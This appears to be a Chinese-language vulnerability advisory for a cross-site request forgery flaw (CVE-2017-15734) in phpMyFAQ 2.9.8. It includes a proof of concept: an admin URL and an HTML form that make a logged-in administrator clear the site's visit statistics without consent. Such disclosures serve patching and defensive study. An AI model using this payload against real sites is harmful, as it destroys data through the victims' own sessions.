phpMyFAQ 2.9.8 - Cross-Site Request Forgery(CSRF)
漏洞标题:phpMyFAQ 2.9.8 - 跨站请求伪造(CSRF)
发布日期:2024-10-26
漏洞作者:CodeSecLab
供应商主页:https://github.com/thorsten/phpMyFAQ
软件链接:https://github.com/thorsten/phpMyFAQ
版本:2.9.8
测试平台:Ubuntu Windows
CVE:CVE-2017-15734
漏洞概念验证(PoC): 访问 http://phpmyfaq/admin/index.php?action=clear-visits 复现步骤:在已登录状态下,另开一个浏览器窗口访问该链接。
技术细节: { “补丁前的保护机制”: “位于stat.main.php文件中的’clear-visits’操作未实施CSRF令牌验证,允许请求在不验证来源真实性的情况下执行。”, “文件导航链”: “公开访问入口URL: http://phpmyfaq/admin/index.php -> 漏洞文件: phpmyfaq/admin/stat.main.php”, “执行路径限制”: “用户必须经过身份验证并拥有适当的权限才能访问’clear-visits’操作。导航到漏洞文件依赖于admin index.php文件中的’action’参数,该参数必须设置为’clear-visits’。”, “请求参数”: “action=clear-visits”, “请求方法”: “GET”, “请求URL”: “http://phpmyfaq/admin/index.php?action=clear-visits”, “最终PoC代码”: “\n
\n <form action="http://phpmyfaq/admin/index.php?action=clear-visits" method="GET">\n <input type="submit" value="提交请求">\n \n \n \n” }[请替换为您自己的域名]